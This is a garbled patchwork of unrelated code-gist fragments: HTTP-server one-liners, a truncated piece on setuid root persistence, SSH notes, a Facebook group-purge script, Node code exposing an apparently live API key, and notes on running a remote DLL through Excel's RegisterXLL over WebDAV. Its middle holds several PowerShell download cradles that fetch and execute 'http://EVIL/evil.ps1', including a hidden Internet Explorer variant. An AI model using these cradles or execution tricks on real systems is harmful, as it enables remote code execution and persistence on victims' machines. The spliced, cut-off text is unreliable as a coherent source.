Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
Let's say somebody temporarily got root access to your system, whether because you "temporarily" gave them sudo rights, they guessed your password, or any other way. Even if you can disable their original method of accessing root, there's an infinite number of dirty tricks they can use to easily get it back in the future.
While the obvious tricks are easy to spot, like adding an entry to /root/.ssh/authorized_keys, or creating a new user, potentially via running malware, or via a cron job. I recently came across a rather subtle one that doesn't require changing any code, but instead exploits a standard feature of Linux user permissions system called setuid to subtly allow them to execute a root shell from any user account from the system (including www-data
, which you might not even know if compromised).
If the "setuid bit" (or flag, or permission mode) is set for executable, the operating system will run not as the cur
###SSH into a remote machine###
ssh user@mydomain.com
#or by ip address
ssh user@192.168.1.1
exit: exit
###Install Something###
#If it's a new server, update apt-get first thing
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
var deleteAllGroupMembers = (function () { | |
var deleteAllGroupMembers = {}; | |
// the facebook ids of the users that will not be removed. | |
// IMPORTANT: add your own facebook id here so that the script will not remove yourself! | |
var excludedFbIds = ['1234','11223344']; // make sure each id is a string! | |
var usersToDeleteQueue = []; | |
var scriptEnabled = false; | |
var processing = false; | |
deleteAllGroupMembers.start = function() { |
const fetch = require('node-fetch') | |
const Bacon = require('baconjs') | |
function getInPortuguese(word) { | |
// Google Translate API is a paid (but dirt cheap) service. This is my key | |
// and will be disabled by the time the video is out. To generate your own, | |
// go here: https://cloud.google.com/translate/v2/getting_started | |
const apiKey = | |
'AIzaSyB4DyRHIsNhogQXmH16YKbZfR-lTXrQpq0' | |
const url = |
#!/usr/bin/env python | |
# Copyright (c) 2017, Brandan Geise [coldfusion] | |
# | |
# Permission is hereby granted, free of charge, to any person obtaining a copy | |
# of this software and associated documentation files (the "Software"), to deal | |
# in the Software without restriction, including without limitation the rights | |
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell | |
# copies of the Software, and to permit persons to whom the Software is | |
# furnished to do so, subject to the following conditions: | |
# |
void Main() | |
{ | |
//testGenerating(); | |
var grid = goodGrid(); | |
//grid.Write().Dump(); | |
grid.MakeGame(); | |
//grid.Write().Dump(); | |
var foundOne = false; | |
var game = grid.Write(); | |
while(!foundOne) |
A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.
When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\
.
The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN
The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc